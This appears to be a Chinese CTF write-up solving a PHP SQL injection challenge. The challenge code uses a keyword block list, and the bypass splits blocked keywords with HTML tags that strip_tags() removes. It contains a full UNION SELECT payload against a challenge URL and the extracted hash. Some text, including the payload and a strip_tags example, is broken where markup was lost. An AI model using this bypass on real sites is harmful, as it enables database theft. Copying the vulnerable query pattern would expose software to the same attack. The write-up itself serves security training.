SQL注入测试

访问参数为:?id=x

查找表为key的数据表,id=1值hash字段值


以下是其中一段代码
//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
	if (substr_count($id, $value) > 0)
	{
		exit('包含敏感关键字!'.$value);
	}
}

//xss过滤
$id = strip_tags($id);

$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
			

首先我们看到这道CTF题的时候  通过代码审计,我们可以知道它过滤了很多关键字,这样一来我们不知道怎么下手,但是它又给出了一段代码,这段代码如果你不注意的话就可能认为是多余的,但是它这段代码就是提示

我们通过百度查一下strip_tags()这个函数的作用

定义和用法

strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

注释:该函数始终会剥离 HTML 注释。这点无法通过 allow 参数改变。

注释:该函数是二进制安全的。

语法 strip_tags(string,allow)

剥去字符串中的 HTML 标签,但允许使用 标签:

world!","");
?>
知道原理后,那么我们就可以直接构造payload了
构造如下http://103.238.227.13:10087/index.php?id=-1 un
ion sel
ect hash,1 fr
om `key`#
最后结果如下:

SQL注入测试

访问参数为:?id=x

查找表为key的数据表,id=1值hash字段值

以下为其中一段代码:

//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
	if (substr_count($id, $value) > 0)
	{
		exit('包含敏感关键字!'.$value);
	}
}

//xss过滤
$id = strip_tags($id);

$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
			

当前结果:

id c3d3c17b4ca7f791f85e#$1cc72af274af4adef
title 1

你可能感兴趣的:(SQL注入测试)